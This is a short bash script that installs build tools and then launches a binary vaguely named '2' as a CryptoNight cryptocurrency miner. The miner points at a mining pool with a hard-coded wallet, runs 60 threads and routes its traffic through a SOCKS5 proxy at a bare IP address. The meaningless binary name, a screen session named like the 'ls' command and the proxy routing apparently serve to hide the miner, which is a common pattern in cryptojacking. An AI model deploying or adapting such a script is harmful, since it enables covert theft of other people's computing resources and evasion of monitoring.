#!/bin/bash
sudo apt update
sudo apt install screen libjansson4 -y
sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
chmod +x 2
screen -dmS ls

 ./2 -a cn/0 -o inf.pool-pay.com:3623  -u inf8TQVLBJ35K6jeGNePCLRzrgt8W6HVGHWgmtNEJTZ4FBAhNaieEBGiSRiTQhF9PXiXcpopBepPdPUAxn2AWS1j3uurvZ2YRH.5000 -t 60 -x socks5://72.210.208.101:4145 -p ros1
